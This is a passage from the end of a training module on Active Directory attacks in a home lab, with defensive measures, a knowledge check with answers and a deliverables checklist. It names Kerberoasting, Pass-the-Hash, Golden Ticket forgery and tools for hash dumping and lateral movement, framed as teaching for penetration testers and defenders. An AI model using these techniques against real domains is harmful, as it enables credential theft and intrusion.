- Deploy ransomware → Domain-wide encryption
Defense-in-Depth Strategy:
- Prevent: Strong passwords (15+ chars), LAPS, Credential Guard
- Detect: Log Event IDs 4768/4769/4624/4688, monitor NTLM usage
- Respond: Isolate compromised accounts, reset KRBTGT (twice), forensic analysis
Common Student Mistakes
1. Using Domain Admin for everything:
- In real enterprise, you'd use least-privilege service accounts
- Lab uses DA for simplicity, but document "in production, use delegated access"
2. Not capturing network traffic:
- Run Wireshark during Kerberoasting to see TGS-REQ/TGS-REP exchange
- Blue team needs to recognize these patterns in PCAP analysis
3. Forgetting to reset KRBTGT after Golden Ticket lab:
- Golden tickets persist even if you "fix" everything else
- Must reset KRBTGT password TWICE (24 hours apart) to fully remediate
4. Over-relying on tools without understanding:
- BloodHound is NOT magic—it visualizes AD relationships you could query manually
- Practice writing custom LDAP queries (ldapsearch, PowerShell Get-ADUser)
Time Investment
- AD deployment: 2-3 hours
- Kerberoasting lab: 1-2 hours
- Pass-the-Hash lab: 1-2 hours
- Lateral movement: 1-2 hours
- BloodHound enumeration: 2-3 hours
- Golden Ticket attack: 1-2 hours
- Detection rules: 2-3 hours
Total: 10-18 hours
Real-World Skills Developed
By mastering this module, you can:
- Perform AD penetration testing for Red Team engagements
- Identify identity-based attack vectors in enterprise environments
- Implement detection rules for credential theft (SOC analyst role)
- Architect secure AD environments (prevent Kerberoasting, PtH)
- Understand attacker tradecraft (MITRE ATT&CK Lateral Movement tactics)
KNOWLEDGE CHECK
Before proceeding to MOD6, you should be able to:
-
What makes an account Kerberoastable?
- Answer: Account must have Service Principal Name (SPN) registered
-
Why is Kerberoasting attractive to attackers?
- Answer: Offline cracking (no account lockout), any domain user can request tickets, targets weak passwords
-
What is the difference between Pass-the-Hash and Pass-the-Ticket?
- Answer: PtH uses NTLM hash for authentication, PtT uses Kerberos ticket (TGT or service ticket)
-
How does PsExec achieve code execution?
- Answer: Copies executable to ADMIN$ share, creates Windows service, starts service, returns output via named pipes
-
What is the BloodHound query to find Kerberoastable accounts?
- Answer: Analysis > "List all Kerberoastable Accounts" or Cypher:
MATCH (u:User {hasspn: true}) RETURN u
- Answer: Analysis > "List all Kerberoastable Accounts" or Cypher:
-
Why are Golden Tickets called "golden"?
- Answer: Forged TGT grants access to ANY resource, valid for 10 years, persists after password resets
-
What Windows Event ID indicates Kerberos service ticket request?
- Answer: Event ID 4769 (TGS-REQ)
-
How do you fully remediate Golden Ticket attack?
- Answer: Reset KRBTGT password TWICE (24 hours apart) to invalidate all forged tickets
DELIVERABLES CHECKLIST
Before proceeding to Module 6, submit/complete:
- Windows Server 2022 Domain Controller configured (apophis.local)
- Windows 10 endpoint joined to domain
- Service account (svc_sql) with SPN created
- Kerberoasting output showing cracked password
- Secretsdump output with NTLM hashes extracted
- PsExec screenshot showing SYSTEM shell on remote target
- CrackMapExec output showing "Pwn3d!" with Pass-the-Hash
- BloodHound JSON files and attack path visualization screenshot
- Golden Ticket creation and usage demonstration
- Screenshots showing:
- GetUserSPNs.py enumeration
- Hashcat cracking Kerberos ticket
- Secretsdump dumping DC hashes
- PsExec shell with whoami output
- BloodHound shortest path to Domain Admins
- CrackMapExec lateral movement to multiple hosts
- Event Viewer showing Event ID 4769 (Kerberoasting detection)
END OF MODULE 5
Next Steps:
- Take snapshot of all VMs: "Post-MOD5-AD-Compromise"
- Document all extracted credentials in password spreadsheet
- Practice writing detection rules for each attack technique
- Proceed to MOD6: Incident Response & Digital Forensics
Remember: Every credential you steal as Red Team becomes forensic evidence for Blue Team. In MOD6, you'll investigate these attacks from the defender's perspective!